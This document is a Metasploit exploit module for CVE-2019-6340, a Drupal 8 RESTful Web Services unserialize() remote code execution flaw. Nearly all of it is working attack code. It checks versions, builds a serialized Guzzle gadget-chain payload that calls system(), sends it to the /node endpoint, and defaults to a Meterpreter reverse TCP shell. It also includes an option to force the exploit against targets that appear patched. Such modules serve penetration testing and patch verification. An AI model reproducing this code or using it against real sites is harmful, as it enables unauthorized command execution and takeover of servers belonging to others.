Drupal RESTful Web Services unserialize() Remote Code Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
  
# NOTE: All (four) Web Services modules need to be enabled  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::HTTP::Drupal  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Drupal RESTful Web Services unserialize() RCE',  
'Description' => %q{  
This module exploits a PHP unserialize() vulnerability in Drupal RESTful  
Web Services by sending a crafted request to the /node REST endpoint.  
  
As per SA-CORE-2019-003, the initial remediation was to disable POST,  
PATCH, and PUT, but Ambionics discovered that GET was also vulnerable  
(albeit cached). Cached nodes can be exploited only once.  
  
Drupal updated SA-CORE-2019-003 with PSA-2019-02-22 to notify users of  
this alternate vector.  
  
Drupal < 8.5.11 and < 8.6.10 are vulnerable.  
},  
'Author' => [  
'Jasper Mattsson', # Discovery  
'Charles Fol', # PoC  
'Rotem Reiss', # Module  
'wvu' # Module  
],  
'References' => [  
['CVE', '2019-6340'],  
['URL', 'https://www.drupal.org/sa-core-2019-003'],  
['URL', 'https://www.drupal.org/psa-2019-02-22'],  
['URL', 'https://www.ambionics.io/blog/drupal8-rce'],  
['URL', 'https://github.com/ambionics/phpggc'],  
['URL', 'https://twitter.com/jcran/status/1099206271901798400']  
],  
'DisclosureDate' => '2019-02-20',  
'License' => MSF_LICENSE,  
'Platform' => ['php', 'unix'],  
'Arch' => [ARCH_PHP, ARCH_CMD],  
'Privileged' => false,  
'Targets' => [  
['PHP In-Memory',  
'Platform' => 'php',  
'Arch' => ARCH_PHP,  
'Type' => :php_memory,  
'Payload' => {'BadChars' => "'"},  
'DefaultOptions' => {  
'PAYLOAD' => 'php/meterpreter/reverse_tcp'  
}  
],  
['Unix In-Memory',  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Type' => :unix_memory,  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/unix/generic',  
'CMD' => 'id'  
}  
]  
],  
'DefaultTarget' => 0,  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'SideEffects' => [IOC_IN_LOGS],  
'Reliablity' => [UNRELIABLE_SESSION], # When using the GET method  
'AKA' => ['SA-CORE-2019-003']  
}  
))  
  
register_options([  
OptEnum.new('METHOD', [true, 'HTTP method to use', 'POST',  
['GET', 'POST', 'PATCH', 'PUT']]),  
OptInt.new('NODE', [false, 'Node ID to target with GET method', 1])  
])  
  
register_advanced_options([  
OptBool.new('ForceExploit', [false, 'Override check result', false])  
])  
end  
  
def check  
checkcode = CheckCode::Unknown  
  
version = drupal_version  
  
unless version  
vprint_error('Could not determine Drupal version')  
return checkcode  
end  
  
if version.to_s !~ /^8\b/  
vprint_error("Drupal #{version} is not supported")  
return CheckCode::Safe  
end  
  
vprint_status("Drupal #{version} targeted at #{full_uri}")  
checkcode = CheckCode::Detected  
  
changelog = drupal_changelog(version)  
  
unless changelog  
vprint_error('Could not determine Drupal patch level')  
return checkcode  
end  
  
case drupal_patch(changelog, 'SA-CORE-2019-003')  
when nil  
vprint_warning('CHANGELOG.txt no longer contains patch level')  
when true  
vprint_warning('Drupal appears patched in CHANGELOG.txt')  
checkcode = CheckCode::Safe  
when false  
vprint_good('Drupal appears unpatched in CHANGELOG.txt')  
checkcode = CheckCode::Appears  
end  
  
# Any further with GET and we risk caching the targeted node  
return checkcode if meth == 'GET'  
  
# NOTE: Exploiting the vuln will move us from "Safe" to Vulnerable  
token = Rex::Text.rand_text_alphanumeric(8..42)  
res = execute_command("echo #{token}")  
  
return checkcode unless res  
  
if res.body.include?(token)  
vprint_good('Drupal is vulnerable to code execution')  
checkcode = CheckCode::Vulnerable  
end  
  
checkcode  
end  
  
def exploit  
if [CheckCode::Safe, CheckCode::Unknown].include?(check)  
if datastore['ForceExploit']  
print_warning('ForceExploit set! Exploiting anyway!')  
else  
fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')  
end  
end  
  
if datastore['PAYLOAD'] == 'cmd/unix/generic'  
print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')  
# XXX: Naughty datastore modification  
datastore['DUMP_OUTPUT'] = true  
end  
  
case target['Type']  
when :php_memory  
# XXX: This will spawn a *very* obvious process  
execute_command("php -r '#{payload.encoded}'")  
when :unix_memory  
execute_command(payload.encoded)  
end  
end  
  
def execute_command(cmd, opts = {})  
vprint_status("Executing with system(): #{cmd}")  
  
# https://en.wikipedia.org/wiki/Hypertext_Application_Language  
hal_json = JSON.pretty_generate(  
'link' => [  
'value' => 'link',  
'options' => phpggc_payload(cmd)  
],  
'_links' => {  
'type' => {  
'href' => vhost_uri  
}  
}  
)  
  
print_status("Sending #{meth} to #{node_uri} with link #{vhost_uri}")  
  
res = send_request_cgi({  
'method' => meth,  
'uri' => node_uri,  
'ctype' => 'application/hal+json',  
'vars_get' => {'_format' => 'hal_json'},  
'data' => hal_json  
}, 3.5)  
  
return unless res  
  
case res.code  
# 401 isn't actually a failure when using the POST method  
when 200, 401  
print_line(res.body) if datastore['DUMP_OUTPUT']  
if meth == 'GET'  
print_warning('If you did not get code execution, try a new node ID')  
end  
when 404  
print_error("#{node_uri} not found")  
when 405  
print_error("#{meth} method not allowed")  
when 422  
print_error('VHOST may need to be set')  
when 406  
print_error('Web Services may not be enabled')  
else  
print_error("Unexpected reply: #{res.inspect}")  
end  
  
res  
end  
  
# phpggc Guzzle/RCE1 system id  
def phpggc_payload(cmd)  
(  
# http://www.phpinternalsbook.com/classes_objects/serialization.html  
<<~EOF  
O:24:"GuzzleHttp\\Psr7\\FnStream":2:{  
s:33:"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{  
s:5:"close";a:2:{  
i:0;O:23:"GuzzleHttp\\HandlerStack":3:{  
s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";  
s:cmd_len:"cmd";  
s:30:"\u0000GuzzleHttp\\HandlerStack\u0000stack";  
a:1:{i:0;a:1:{i:0;s:6:"system";}}  
s:31:"\u0000GuzzleHttp\\HandlerStack\u0000cached";  
b:0;  
}  
i:1;s:7:"resolve";  
}  
}  
s:9:"_fn_close";a:2:{  
i:0;r:4;  
i:1;s:7:"resolve";  
}  
}  
EOF  
).gsub(/\s+/, '').gsub('cmd_len', cmd.length.to_s).gsub('cmd', cmd)  
end  
  
def meth  
datastore['METHOD'] || 'POST'  
end  
  
def node  
datastore['NODE'] || 1  
end  
  
def node_uri  
if meth == 'GET'  
normalize_uri(target_uri.path, '/node', node)  
else  
normalize_uri(target_uri.path, '/node')  
end  
end  
  
def vhost_uri  
full_uri(  
normalize_uri(target_uri.path, '/rest/type/shortcut/default'),  
vhost_uri: true  
)  
end  
  
end  
`